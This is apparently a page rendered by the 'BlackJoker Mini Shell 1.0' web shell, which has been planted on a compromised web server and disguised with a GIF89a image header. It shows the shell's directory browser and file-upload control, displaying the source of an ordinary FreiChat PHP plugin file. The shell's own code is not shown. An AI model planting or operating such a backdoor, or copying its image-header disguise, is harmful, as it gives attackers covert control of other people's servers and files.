GIF89a; Mini Shell

Mini Shell

Direktori : /home/serb/public_html/freichat/client/plugins/
Upload File :
Current File : /home/serb/public_html/freichat/client/plugins/base.php

<?php

session_start(); //Start the session
//Base class for Plugins

require '../../../arg.php';


class base extends FreiChat{

//------------------------------------------------------------------------------------------------

    public function __construct() {
        parent::__construct();
        $this->init_vars();
        $this->get_js_config();
    }
//----------------------------------------------------------------------------------------------
    public function bigintval($value) {
        $value = trim($value);
        if (ctype_digit($value)) {
            return $value;
        }
        $value = preg_replace("/[^0-9](.*)$/", '', $value);
        if (ctype_digit($value)) {
            return $value;
        }
        return 0;
    }
}

./BlackJoker Mini Shell 1.0